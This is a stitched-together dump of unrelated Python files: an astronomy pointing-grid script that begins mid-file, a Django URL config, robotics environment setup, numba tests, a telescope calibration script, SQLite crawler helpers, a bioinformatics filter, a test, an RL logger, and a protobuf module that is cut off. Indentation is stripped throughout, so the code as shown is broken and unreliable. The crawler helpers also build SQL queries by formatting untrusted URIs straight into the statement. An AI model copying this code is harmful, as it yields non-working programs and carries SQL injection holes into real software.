parser.add_argument('-v','--verbose_file',action="store_true",help='Creates a more verbose output file with more information than make_beam.c can handle.')
parser.add_argument('--pulsar',type=str,nargs='+',help='A list of pulsar to mark on the plot')
parser.add_argument('--label',type=str,help='A label to put in front of the pointings.')
parser.add_argument('-n', '--n_pointings', type=int, default=None, help='Number of pointings per output file.')
parser.add_argument('--out_file_name', type=str, help='The output file name.')
parser.add_argument('--add_text', action="store_true", help='Adds the pointing in text for each circle on the output plot')
args=parser.parse_args()
opts_string = ""
for k in args.__dict__:
if args.__dict__[k] is not None:
if k == "pointing":
opts_string = opts_string + ' --' + str(k) + ' "' + str(args.__dict__[k][0]) +\
' ' + str(args.__dict__[k][1]) + '"'
else:
opts_string = opts_string + ' --' + str(k) + ' ' + str(args.__dict__[k])
if args.obsid:
obs, ra, dec, duration, xdelays, centrefreq, channels = \
meta.get_common_obs_metadata(args.obsid)
#get fwhm in radians
centre_fwhm = np.radians(args.deg_fwhm)
#all_pointing parsing
if (args.loop != 1) and args.all_pointings:
print("Can't use --loop and --all_poinitings as all_pointings calculates the "
"loops required. Exiting.")
quit()
if (args.loop != 1) and args.fill:
print("Can't use --loop and --fill as --fill calculates the "
"loops required. Exiting.")
quit()
if args.pointing and args.all_pointings:
print("Can't use --pointing and --all_poinntings as --all_pointings calculates "
"the pointing. Exiting.")
quit()
if args.pointing and args.pulsar:
print("Can't use --pointing and --pulsar as --pulsar calculates the pointing. Exiting.")
quit()
if args.pulsar and args.all_pointings:
print("Can't use --pulsar and --all_poinntings as --all_pointings calculates "
"the pointing. Exiting.")
quit()
if args.fill:
args.loop = int( (args.fill - args.deg_fwhm/2.) / (args.deg_fwhm*args.fraction) )
print("Using {} loops to fill {} degrees".format(args.loop, args.fill ))
#calculate pointing
if args.all_pointings:
#calculating loop number
fudge_factor = 2.
tile_fwhm = np.degrees(fudge_factor * (3*10**8/(centrefreq*10**6))/6.56 )
#account for the "increase" in tile beam size due to drifting
tile_fwhm += duration/3600.*15.
args.loop = int(tile_fwhm/2./(args.deg_fwhm*args.fraction))
#calculating pointing from metadata
if int(obs) < 1252177700 :
#the ra used to mean the start of the obs so it had to be corrected for
ra = np.radians(ra + duration/3600.*15./2)
else:
ra = np.radians(ra)
dec = np.radians(dec)
elif args.pulsar:
temp = get_psrcat_ra_dec(pulsar_list=args.pulsar)
_, raj, decj = format_ra_dec(temp, ra_col = 1, dec_col = 2)[0]
coord = SkyCoord(raj, decj, unit=(u.hourangle,u.deg))
ra = coord.ra.radian #in radians
dec = coord.dec.radian
elif args.pointing:
coord = SkyCoord(args.pointing.split("_")[0],args.pointing.split("_")[1],
unit=(u.hourangle,u.deg))
ra = coord.ra.radian #in radians
dec = coord.dec.radian
else:
print("Please use either --pointing, --pulsar or --all_pointings. Exiting.")
quit()
#calculate grid
rads, decds = get_grid(ra, dec, centre_fwhm*args.fraction, args.loop, grid_type=args.type)
#remove pointings outside of ra or dec range
if args.dec_range != [-90,90] or args.ra_range != [0, 360]:
print("Removing pointings outside of ra dec ranges")
radls = []
decdls = []
for i in range(len(rads)):
if (args.dec_range[0] < float(decds[i]) < args.dec_range[1] ) and \
(args.ra_range[0] < float(rads[i]) < args.ra_range[1]):
radls.append(rads[i])
decdls.append(decds[i])
rads = radls
decds = decdls
if args.all_pointings:
#calculate powers
obeg, oend = meta.obs_max_min(obs)
if args.begin:
start_time = obeg - args.begin
else:
start_time = 0
if args.end and args.begin:
duration = args.end - args.begin
elif args.end:
duration = args.end - obeg
obs_metadata = [obs, ra, dec, duration, xdelays, centrefreq, channels]
names_ra_dec = []
for ni in range(len(rads)):
if float(decds[ni]) < -90.:
continue
names_ra_dec.append(["name", rads[ni], decds[ni]])
names_ra_dec = np.array(names_ra_dec)
power = get_beam_power_over_time(obs_metadata,
names_ra_dec, degrees=True)
#check each pointing is within the tile beam
radls = []
decdls = []
tFWHM = np.amax(power)/2. #assumed half power point of the tile beam
for ni in range(len(names_ra_dec)):
if max(power[ni]) > tFWHM:
radls.append(rads[ni])
decdls.append(decds[ni])
rads = radls
decds = decdls
print("Using skycord to convert ra dec")
#Use skycoord to get asci
coord = SkyCoord(rads,decds,unit=(u.deg,u.deg))
#unformated
rags_uf = coord.ra.to_string(unit=u.hour, sep=':')
decgs_uf = coord.dec.to_string(unit=u.degree, sep=':')
ras = []; decs = []; theta = []; phi = []
time = Time(float(args.obsid),format='gps')
print("Formating the outputs")
#format the ra dec strings
for i in range(len(rags_uf)):
rag = rags_uf[i]
decg = decgs_uf[i]
temp = format_ra_dec([[rag,decg]])
rag = temp[0][0]
decg = temp[0][1]
if args.verbose_file:
az,za,azd,zad = getTargetAZZA(rag,decg,time)
else:
az,za,azd,zad = [0,0,0,0]
ras.append(rag)
decs.append(decg)
theta.append(az)
phi.append(za)
if args.out_file_name:
out_file_name = args.out_file_name
else:
if args.obsid:
out_file_name = str(args.obsid)
else:
out_file_name = ''
if args.pulsar:
out_file_name = '{0}_{1}'.format(out_file_name, args.pulsar[0])
out_file_name += '_grid_positions'
if args.dec_range != [-90,90] or args.ra_range != [0, 360]:
out_file_name += '_ra_dec_limited'
out_file_name = '{0}_f{1}_d{2}_l{3}'.format(out_file_name, args.fraction,
args.deg_fwhm, args.loop)
#Writing file
if args.n_pointings is None:
print("Recording the dec limited positons in {0}.txt".format(out_file_name))
with open('{0}.txt'.format(out_file_name),'w') as out_file:
if args.verbose_file:
out_line = "#ra dec az za\n"
out_file.write(out_line)
for i in range(len(rads)):
if args.verbose_file:
out_line = str(ras[i])+" "+str(decs[i])+" "+str(theta[i])+" "\
+str(phi[i])+" "+str(rads[i])+" "\
+str(decds[i])+"\n"
elif args.label:
out_line = "{},{}_{}\n".format(args.label, ras[i], decs[i])
else:
out_line = str(ras[i])+"_"+str(decs[i])+"\n"
out_file.write(out_line)
else:
ra_chunks = [ras[x:x+args.n_pointings] for x in range(0, len(ras), args.n_pointings)]
dec_chunks = [decs[x:x+args.n_pointings] for x in range(0, len(decs), args.n_pointings)]
for ci in range(len(ra_chunks)):
first_id = ci * args.n_pointings + 1
last_id = ci * args.n_pointings + len(ra_chunks[ci])
print("Recording the dec limited positons in {0}_{1}_{2}.txt".format(out_file_name, first_id, last_id))
with open('{0}_{1}_{2}.txt'.format(out_file_name, first_id, last_id),'w') as out_file:
for i in range(len(ra_chunks[ci])):
out_file.write("{0}_{1}\n".format(ra_chunks[ci][i], dec_chunks[ci][i]))
#matplotlib.use('Agg')
print("Plotting")
fig = plt.figure(figsize=(7, 7))
if args.aitoff:
fig.add_subplot(111)
print("changing axis")
ax = plt.axes(projection='mollweide')
rads = -(np.radians(np.array(rads)))+ np.pi
decds = np.radians(np.array(decds))
else:
plt.axes().set_aspect('equal')
ax = plt.gca()
#ax.axis([325., 345., -9., 0.])
plt.xlabel("ra (degrees)")
plt.ylabel("dec (degrees)")
for i in range(len(ras)):
if args.aitoff:
fwhm_circle = centre_fwhm/cos(decds[i]) / 2.
circle = plt.Circle((rads[i],decds[i]),fwhm_circle,
color='r', lw=0.1,fill=False)
ax.add_artist(circle)
else:
fwhm_vert = np.degrees(centre_fwhm/cos(np.radians(decds[i] + 26.7))**2)
fwhm_horiz = np.degrees(centre_fwhm/cos(np.radians(decds[i])) )
ellipse = patches.Ellipse((rads[i],decds[i]), fwhm_horiz, fwhm_vert,
linewidth=0.3, fill=False, edgecolor='green')
ax.add_patch(ellipse)
if args.add_text:
ax.text(rads[i], decds[i], str(ras[i] + "_" + decs[i]), fontsize=4, ha='center', va='center')
#fwhm_circle = centre_fwhm/cos(np.radians(decds[i])) / 2.
#circle = plt.Circle((rads[i],decds[i]),np.degrees(fwhm_circle),
# color='r', lw=0.1,fill=False)
plt.scatter(rads,decds,s=0.1,c='black')
#add some pulsars
if args.pulsar:
ra_PCAT = []
dec_PCAT = []
pulsar_list = get_psrcat_ra_dec(pulsar_list = args.pulsar)
for pulsar in pulsar_list:
ra_temp, dec_temp = sex2deg(pulsar[1], pulsar[2])
ra_PCAT.append(ra_temp)
dec_PCAT.append(dec_temp)
ax.scatter(ra_PCAT, dec_PCAT, s=15, color ='r', zorder=100)
plt.savefig('{0}.png'.format(out_file_name), bbox_inches='tight', dpi =1000)
print("Number of pointings: " + str(len(rads)))
#times out and segfaults after this so I'm going to exit here
exit()
|
from django.conf import settings
from django.conf.urls import url, patterns
from models import Document
urlpatterns = patterns('mmm.views',
url(r'^member/(?P<mid>\d+)/$',
'member_docs',
name='member-mmms'),
url(r'^committee/(?P<cid>\d+)/$',
'committee_docs',
name='committee-mmms'),
)
|
import gym
import envs.fetch as fetch_env
import envs.hand as hand_env
from .utils import goal_distance, goal_distance_obs
Robotics_envs_id = [
'FetchPushDyn-v1',
'FetchReach-v1',
'FetchPush-v1',
'FetchSlide-v1',
'FetchPickAndPlace-v1',
'FetchPushNew-v1',
'FetchCurling-v1',
'FetchPushObstacle-v1',
'FetchPickObstacle-v1',
'FetchPushNoObstacle-v1',
'FetchPickNoObstacle-v1',
'FetchPushLabyrinth-v1',
'FetchPickAndThrow-v1',
'FetchPickAndSort-v1',
'HandManipulateBlock-v0',
'HandManipulateEgg-v0',
'HandManipulatePen-v0',
'HandReach-v0'
]
def make_env(args):
assert args.env in Robotics_envs_id
if args.env[:5]=='Fetch':
return fetch_env.make_env(args)
else: # Hand envs
return hand_env.make_env(args)
def clip_return_range(args):
gamma_sum = 1.0/(1.0-args.gamma)
return{
'FetchPushDyn-v1': (-gamma_sum, 0.0),
'FetchReach-v1': (-gamma_sum, 0.0),
'FetchPush-v1': (-gamma_sum, 0.0),
'FetchSlide-v1': (-gamma_sum, 0.0),
'FetchPickAndPlace-v1': (-gamma_sum, 0.0),
'FetchPickObstacle-v1': (-gamma_sum, 0.0),
'FetchPickNoObstacle-v1': (-gamma_sum, 0.0),
'FetchPushLabyrinth-v1': (-gamma_sum, 0.0),
'FetchPickAndThrow-v1': (-gamma_sum, 0.0),
'FetchPickAndSort-v1': (-gamma_sum, 0.0),
'HandManipulateBlock-v0': (-gamma_sum, 0.0),
'HandManipulateEgg-v0': (-gamma_sum, 0.0),
'HandManipulatePen-v0': (-gamma_sum, 0.0),
'HandReach-v0': (-gamma_sum, 0.0)
}[args.env]
|
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import
from numba import njit, cfunc, cgutils
from numba.six import exec_
from numba.utils import PY2
from .support import TestCase, unittest
unicode_name1 = u"""
def unicode_name1(เฒ _เฒฐเณ, เฒ เจเฒ ):
return (เฒ _เฒฐเณ) + (เฒ เจเฒ )
"""
unicode_name2 = u"""
def ิพ_ิพ(เฒ _เฒฐเณ, เฒ เจเฒ ):
return (เฒ _เฒฐเณ) + (เฒ เจเฒ )
"""
@unittest.skipIf(PY2, "unicode identifier not supported in python2")
class TestUnicodeNames(TestCase):
def make_testcase(self, src, fname):
glb = {}
exec_(src, glb)
fn = glb[fname]
return fn
def test_unicode_name1(self):
fn = self.make_testcase(unicode_name1, 'unicode_name1')
cfn = njit(fn)
self.assertEqual(cfn(1, 2), 3)
def test_unicode_name2(self):
fn = self.make_testcase(unicode_name2, 'ิพ_ิพ')
cfn = njit(fn)
self.assertEqual(cfn(1, 2), 3)
def test_cfunc(self):
fn = self.make_testcase(unicode_name2, 'ิพ_ิพ')
cfn = cfunc("int32(int32, int32)")(fn)
self.assertEqual(cfn.ctypes(1, 2), 3)
class TestUnicodeUtils(TestCase):
def test_normalize_ir_text(self):
# non-unicode input
out = cgutils.normalize_ir_text('abc')
# str returned
self.assertIsInstance(out, str)
# try encoding to latin
out.encode('latin1')
@unittest.skipIf(PY2, "unicode identifier not supported in python2")
def test_normalize_ir_text_py3(self):
# unicode input
out = cgutils.normalize_ir_text(unicode_name2)
# str returned
self.assertIsInstance(out, str)
# try encoding to latin
out.encode('latin1')
if __name__ == '__main__':
unittest.main()
|
import TUI.TUIModel
def init(sr):
"""Open the DIS Expose window so the user can see what's going on."""
tuiModel = TUI.TUIModel.getModel()
tuiModel.tlSet.makeVisible("None.DIS Expose")
def run(sr):
"""Sample script to take a series of DIS calibration images
and demonstrate looping through data in Python.
The exposure times and # of iterations are short so the demo runs quickly.
"""
# typeTimeNumList is a list of calibration info
# each element of the list is a list of:
# - exposure type
# - exposure time (sec)
# - number of exposures
typeTimeNumList = [
["flat", 1, 2],
["flat", 5, 2],
["bias", 0, 2],
["dark", 1, 2],
["dark", 5, 2],
]
for expType, expTime, numExp in typeTimeNumList:
if expType == "bias":
# bias, so cannot specify time
cmdStr = "%s n=%d name=dis%s" % (expType, numExp, expType)
else:
cmdStr = "%s time=%s n=%d name=dis%s" % (expType, expTime, numExp, expType)
yield sr.waitCmd(
actor = "disExpose",
cmdStr = cmdStr,
abortCmdStr = "abort",
)
|
def insert_crawl_seed(uri, crawlid):
insert_seed(uri)
try:
cursor.execute("INSERT INTO CrawlSeeds (seedURI, crawlId) VALUES ('{uri}', {crawlId})".format(uri=uri, crawlId=crawlid))
except sqlite3.Error as er:
print(er, end='\n\t...')
if str(er) == 'UNIQUE constraint failed: CrawlSeeds.seedURI, CrawlSeeds.crawlId':
print("Already tested the '{}' seed during this crawl.".format(uri))
def insert_seed(uri):
try:
cursor.execute("INSERT INTO Seed (seedURI) VALUES ('{uri}')".format(uri=uri))
except sqlite3.Error as er:
print(er, end='\n\t...')
if str(er) == 'UNIQUE constraint failed: Seed.seedURI':
print("'{}' Already in Seeds!".format(uri))
def insert_link(uri, crawlid, source, failed=0):
try:
cursor.execute("Insert INTO Link (address, crawlId, originSeedURI, failed) VALUES ('{uri}', '{crawlId}', '{source}', {failed})".format(uri=uri, crawlId=crawlid, source=source, failed=failed))
except sqlite3.Error as er:
print(er, end='\n\t...')
if str(er) == 'UNIQUE constraint failed: Link.address, Link.originSeedURI, Link.crawlId':
print("'{}' Already visited in this crawl through this seed. Ignoring.".format(uri))
def insert_crawl(crawlid):
try:
cursor.execute("INSERT INTO Crawl (crawlId) VALUES ({crawlId})".format(crawlId=crawlid))
except sqlite3.Error as er:
print(er)
if str(er) == 'UNIQUE constraint failed: Crawl.crawlId':
print('\t...crawlId exists.')
print('Critical Error.')
print('Exiting!')
exit(1)
def insert_valid_rdfuri(uri, crawlid, source, response_format):
try:
cursor.execute("INSERT INTO RdfURI (rdfSeedURI, crawlId, originSeedURI, contentFormat) VALUES ('{uri}', {crawlId}, '{source}', '{format}')".format(uri=uri, crawlId=crawlid, source=source, format=response_format))
except sqlite3.Error as er:
print(er, end='\n\t...')
if str(er) == 'UNIQUE constraint failed: RdfURI.rdfSeedURI, RdfURI.originSeedURI, RdfURI.crawlId':
print("'{}' - '{}' pair is already discovered in this crawl! Ignoring.".format(uri, source))
def insert_failed_seed(uri, crawlid, code):
try:
cursor.execute("INSERT INTO FailedSeed (seedURI, crawlId, statusCode) VALUES ('{uri}', {crawlId}, '{code}')".format(uri=uri, crawlId=crawlid, code=code))
except sqlite3.Error as er:
print(er, end='\n\t...')
if str(er) == 'UNIQUE constraint failed: FailedSeed.seedURI, FailedSeed.crawlId':
print("Already attempted and failed to request '{}' during this crawl. Ignoring.".format(uri)) |
#!/usr/bin/python
# -*- coding: utf-8 -*-
################################################################################
# Copyright or ยฉ or Copr. Anthony Mathelier and Alessandra Carbone (02-05-2010)
# anthony.mathelier@gmail.com, alessandra.carbone@lip6.fr
#
# This software is a computer program whose purpose is to provide a platform to
# check several questions around miRNAs and pre-miRNAs prediction and play
# between sensitivity and specificity by using parameters variability.
#
# This software is governed by the CeCILL license under French law and
# abiding by the rules of distribution of free software. You can use,
# modify and/or redistribute the software under the terms of the CeCILL
# license as circulated by CEA, CNRS and INRIA at the following URL
# "http://www.cecill.info".
#
# As a counterpart to the access to the source code and rights to copy,
# modify and redistribute granted by the license, users are provided only
# with a limited warranty and the software's author, the holder of the
# economic rights, and the successive licensors have only limited
# liability.
#
# In this respect, the user's attention is drawn to the risks associated
# with loading, using, modifying and/or developing or reproducing the
# software by the user in light of its specific status of free software,
# that may mean that it is complicated to manipulate, and that also
# therefore means that it is reserved for developers and experienced
# professionals having in-depth computer knowledge. Users are therefore
# encouraged to load and test the software's suitability as regards their
# requirements in conditions enabling the security of their systems and/or
# data to be ensured and, more generally, to use and operate it in the
# same conditions as regards security.
#
# The fact that you are presently reading this means that you have had
# knowledge of the CeCILL license and that you accept its terms.
################################################################################
###############################################################################
# script permettant de filter les prรฉcurseurs chevauchants des gรจnes dรฉfinis
# dans le fichier GenBank passรฉ en paramรจtre
###############################################################################
import sys, string, re
from Bio import GenBank
def readGbk(cur):
featList = []
for feat in cur.features:
if (feat.type == "CDS" or feat.type == "exon" or feat.type == "ncRNA" or
feat.type == "rRNA" or feat.type == "scRNA" or feat.type == "snRNA" or
feat.type == "snoRNA" or feat.type == "tRNA" or feat.type == "21U-RNA"):
if feat.type == "ncRNA":
classe = feat.qualifiers['ncRNA_class'][0]
if (classe <> "rRNA" and classe <> "scRNA" and classe <> "snRNA" and
classe <> "snoRNA" and classe <> "tRNA" and classe <> "21U-RNA"):
continue
if feat.sub_features:
for subfeat in feat.sub_features:
featList.append((subfeat.location.nofuzzy_start,
subfeat.location.nofuzzy_end))
else:
featList.append((feat.location.nofuzzy_start, feat.location.nofuzzy_end))
return featList
def find(begin, end, feat):
for fstart, fend in feat:
if fstart > end:
return 0
if ((begin <= fend and begin > fstart) or
(end <= fend and end > fstart) or
(begin <= fstart and end >= fend)):
return 1
return 0
################################################################################
# Lecture des prรฉcurseurs et test pour savoir si il chevauche un gรจne ou non
################################################################################
def filter(input, hash, feat):
query = ""
prec = ""
seq = ""
struct = ""
for line in input:
grp = re.match('>(\S+) (\S+) begin:(\d+) end:(\d+)$', line)
if grp:
query = grp.group(1)
prec = grp.group(2)
before = eval(grp.group(3))
after = eval(grp.group(4))
elif re.search('[AGCTUacgtu]+', line):
seq = line
elif re.search('\(+', line):
struct = line
(begin, end, strand) = hash[prec]
if not find(begin, end, feat):
print ">%s %s excise_beg:%d excise_end:%d before:%d after:%d"%(prec,
strand, begin, end, before, after)
print seq,
print struct,
input.close()
################################################################################
# Parse the precursor file
################################################################################
def parse_prec(stream):
hash = {}
for line in stream:
grp = re.match('>(\S+) (\S+) excise_beg:(\d+) excise_end:(\d+)$', line)
if grp:
hash[grp.group(1)] = (eval(grp.group(3)), eval(grp.group(4)), grp.group(2))
stream.close()
return hash
################################################################################
# MAIN
################################################################################
if __name__ == "__main__":
if (len (sys.argv) <> 4):
sys.exit ("\nUsage : " + sys.argv[0]+ " <predictions> <precursors> <GenBank>\n")
input = open(sys.argv[1], 'r')
prec = open(sys.argv[2], 'r')
gbk = open(sys.argv[3], 'r')
prec_hash = parse_prec(prec)
feature_parser = GenBank.FeatureParser()
gb_iterator = GenBank.Iterator(gbk, feature_parser)
gb_cur = gb_iterator.next()
feat = readGbk(gb_cur)
feat.sort()
filter(input, prec_hash, feat)
gbk.close()
|
# Copyright 2021 Richard Maynard (richard.maynard@gmail.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from pkg_resources import DistributionNotFound
from tfworker.commands.version import VersionCommand
def mock_get_distribution(package: str):
raise DistributionNotFound
class TestVersionCommand:
def test_exec(self, capsys):
VersionCommand().exec()
text = capsys.readouterr()
assert text.out.startswith("terraform-worker version")
with mock.patch(
"tfworker.commands.version.get_distribution",
side_effect=mock_get_distribution,
):
VersionCommand().exec()
text = capsys.readouterr()
assert text.out == "terraform-worker version unknown\n"
|
import matplotlib.pyplot as plt
from collections import deque
import numpy as np
import torch
import shutil
import os
from CustomSummaryWriter import CustomSummaryWriter
from params import Params
from model import ActorCriticWrapper
class Logger_Team():
"""Simple Logger class to store stats for printing & Tensorboard Visualization (Custom Team Stats)"""
def __init__(self, params=Params(), tb=CustomSummaryWriter(), agent_ns="Team"):
self.params = params
self.agent_ns = agent_ns # Agent's Namespace
self.scores_cum_list = []
self.scores_deque = deque(maxlen=100)
self.scores_cum_deque = deque(maxlen=100)
self.scores_cum_opp_list = []
self.scores_opp_deque = deque(maxlen=100)
self.scores_opp_cum_deque = deque(maxlen=100)
self.wins_deque = deque(maxlen=100)
self.draws_deque = deque(maxlen=100)
self.lose_deque = deque(maxlen=100)
self.wins_cum_deque = deque(maxlen=100) # Cumulative
self.draws_cum_deque = deque(maxlen=100) # Cumulative
self.lose_cum_deque = deque(maxlen=100) # Cumulative
self.hparam_dict = params.get_hparam_dict()
self.t = 0
self.tb = tb
# torch.autograd.set_detect_anomaly(True)
def initialize(self, agent, state_size, action_size):
""" Initializes agent within logger class."""
self.agent = agent
if not self.params.restart_training:
agent.actor_net.load_state_dict(torch.load("{}/{}".format(self.params.checkpoint_actor_weights_dir, self.params.actor_weights_filename_to_resume)))
agent.critic_net.load_state_dict(torch.load("{}/{}".format(self.params.checkpoint_critic_weights_dir, self.params.critic_weights_filename_to_resume)))
else:
self.clear_weights()
# Initialize network wrapper for model visualization on TensorBoard
wrapper_net = ActorCriticWrapper(state_size, action_size, self.params)
self.tb.add_graph(wrapper_net,
(torch.zeros(state_size).unsqueeze(0).to(self.params.device)))
def log_stats(self, episode, team_score, opponent_score):
""" Log stats onto Tensorboard on every interations """
self.scores_deque.append(team_score)
self.scores_cum_list.append(sum(self.scores_deque))
self.scores_cum_deque.append(sum(self.scores_deque))
self.scores_opp_deque.append(opponent_score)
self.scores_cum_opp_list.append(sum(self.scores_opp_deque))
self.scores_opp_cum_deque.append(sum(self.scores_opp_deque))
self.wins_deque.append(int(1 if team_score > opponent_score else 0))
self.draws_deque.append(int(1 if team_score == opponent_score else 0))
self.lose_deque.append(int(1 if team_score < opponent_score else 0))
self.wins_cum_deque.append(np.count_nonzero(self.wins_deque))
self.draws_cum_deque.append(np.count_nonzero(self.draws_deque))
self.lose_cum_deque.append(np.count_nonzero(self.lose_deque))
# Tensorboard Logging
self.tb.add_scalar(f"{self.agent_ns}/Score", self.scores_cum_deque[-1], episode)
self.tb.add_scalar(f"Opponent/Score", self.scores_opp_cum_deque[-1], episode)
self.tb.add_scalar(f"{self.agent_ns}/Wins", self.wins_cum_deque[-1], episode)
self.tb.add_scalar(f"{self.agent_ns}/Draws", self.draws_cum_deque[-1], episode)
self.tb.add_scalar(f"{self.agent_ns}/Loss", self.lose_cum_deque[-1], episode)
def log_overall_perf_tb(self):
""" Log overall performance of training cycle """
self.tb.add_hparams(self.hparam_dict,
{
f"{self.agent_ns}/Score": self.scores_cum_deque[-1],
f"Opponent/Score": self.scores_opp_cum_deque[-1],
f"{self.agent_ns}/Wins": self.wins_cum_deque[-1],
f"{self.agent_ns}/Draws": self.draws_cum_deque[-1],
f"{self.agent_ns}/Loss": self.lose_cum_deque[-1],
},
)
self.tb.close()
def plot_stats(self):
""" Plots stats recorded """
print("\n=====", self.agent_ns, "=====")
_, axs = plt.subplots(2, 3, figsize=(30, 10))
# Team Scores
axs[0,0].plot(np.arange(1, len(self.scores_cum_list)+1), self.scores_cum_list)
axs[0,0].set(xlabel='Episode #', ylabel='Score')
axs[0,0].set_title(f'{self.agent_ns}/Score')
# Opponent Scores
axs[0,1].plot(np.arange(1, len(self.scores_cum_opp_list)+1), self.scores_cum_opp_list)
axs[0,1].set(xlabel='Episode #', ylabel='Score')
axs[0,1].set_title(f'Opponent/Score')
# Wins
axs[0,2].plot(np.arange(1, len(self.wins_cum_deque)+1), self.wins_cum_deque)
axs[0,2].set(xlabel='Episode #', ylabel='Wins')
axs[0,2].set_title(f'{self.agent_ns}/Wins [{len(self.wins_cum_deque)} Matches]')
# Draws
axs[1,0].plot(np.arange(1, len(self.draws_cum_deque)+1), self.draws_cum_deque)
axs[1,0].set(xlabel='Episode #', ylabel='Draws')
axs[1,0].set_title(f'{self.agent_ns}/Draws [{len(self.draws_cum_deque)} Matches]')
# Lose
axs[1,1].plot(np.arange(1, len(self.lose_cum_deque)+1), self.lose_cum_deque)
axs[1,1].set(xlabel='Episode #', ylabel='Lose')
axs[1,1].set_title(f'{self.agent_ns}/Lose [{len(self.lose_cum_deque)} Matches]')
plt.show()
def clear_weights(self):
if os.path.exists(self.params.checkpoint_actor_weights_dir):
shutil.rmtree(self.params.checkpoint_actor_weights_dir)
if os.path.exists(self.params.checkpoint_critic_weights_dir):
shutil.rmtree(self.params.checkpoint_critic_weights_dir)
os.makedirs(self.params.checkpoint_actor_weights_dir)
os.makedirs(self.params.checkpoint_critic_weights_dir)
def save_weights(self, episode):
torch.save(self.agent.actor_net.state_dict(), "{}/checkpoint_actor_ep{}.pth".format(self.params.checkpoint_actor_weights_dir, episode))
torch.save(self.agent.critic_net.state_dict(), "{}/checkpoint_critic_ep{}.pth".format(self.params.checkpoint_critic_weights_dir, episode))
####################################################
# NOTE: Unable to add_graph for multiple graphs. #
# https://github.com/lanpa/tensorboardX/issues/319 #
####################################################
# self.tb.add_graph(agent.actor_net, torch.zeros(state_size).to(self.params.device))
# self.tb.add_graph(agent.critic_net,
# (torch.zeros(state_size).unsqueeze(0).to(self.params.device),
# torch.zeros(action_size).unsqueeze(0).to(self.params.device))) |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/spanner_v1/proto/spanner.proto
import sys
_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode("latin1"))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
from google.rpc import status_pb2 as google_dot_rpc_dot_status__pb2
from google.cloud.spanner_v1.proto import (
keys_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_keys__pb2,
)
from google.cloud.spanner_v1.proto import (
mutation_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_mutation__pb2,
)
from google.cloud.spanner_v1.proto import (
result_set_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2,
)
from google.cloud.spanner_v1.proto import (
transaction_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2,
)
from google.cloud.spanner_v1.proto import (
type_pb2 as google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2,
)
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/spanner_v1/proto/spanner.proto",
package="google.spanner.v1",
syntax="proto3",
serialized_options=_b(
"\n\025com.google.spanner.v1B\014SpannerProtoP\001Z8google.golang.org/genproto/googleapis/spanner/v1;spanner\252\002\027Google.Cloud.Spanner.V1\312\002\027Google\\Cloud\\Spanner\\V1\352A_\n\037spanner.googleapis.com/Database\022<projects/{project}/instances/{instance}/databases/{database}"
),
serialized_pb=_b(
'\n+google/cloud/spanner_v1/proto/spanner.proto\x12\x11google.spanner.v1\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1cgoogle/protobuf/struct.proto\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x17google/rpc/status.proto\x1a(google/cloud/spanner_v1/proto/keys.proto\x1a,google/cloud/spanner_v1/proto/mutation.proto\x1a.google/cloud/spanner_v1/proto/result_set.proto\x1a/google/cloud/spanner_v1/proto/transaction.proto\x1a(google/cloud/spanner_v1/proto/type.proto"~\n\x14\x43reateSessionRequest\x12\x39\n\x08\x64\x61tabase\x18\x01 \x01(\tB\'\xe0\x41\x02\xfa\x41!\n\x1fspanner.googleapis.com/Database\x12+\n\x07session\x18\x02 \x01(\x0b\x32\x1a.google.spanner.v1.Session"\xa9\x01\n\x1a\x42\x61tchCreateSessionsRequest\x12\x39\n\x08\x64\x61tabase\x18\x01 \x01(\tB\'\xe0\x41\x02\xfa\x41!\n\x1fspanner.googleapis.com/Database\x12\x34\n\x10session_template\x18\x02 \x01(\x0b\x32\x1a.google.spanner.v1.Session\x12\x1a\n\rsession_count\x18\x03 \x01(\x05\x42\x03\xe0\x41\x02"J\n\x1b\x42\x61tchCreateSessionsResponse\x12+\n\x07session\x18\x01 \x03(\x0b\x32\x1a.google.spanner.v1.Session"\xe4\x02\n\x07Session\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x36\n\x06labels\x18\x02 \x03(\x0b\x32&.google.spanner.v1.Session.LabelsEntry\x12/\n\x0b\x63reate_time\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12=\n\x19\x61pproximate_last_use_time\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01:t\xea\x41q\n\x1espanner.googleapis.com/Session\x12Oprojects/{project}/instances/{instance}/databases/{database}/sessions/{session}"I\n\x11GetSessionRequest\x12\x34\n\x04name\x18\x01 \x01(\tB&\xe0\x41\x02\xfa\x41 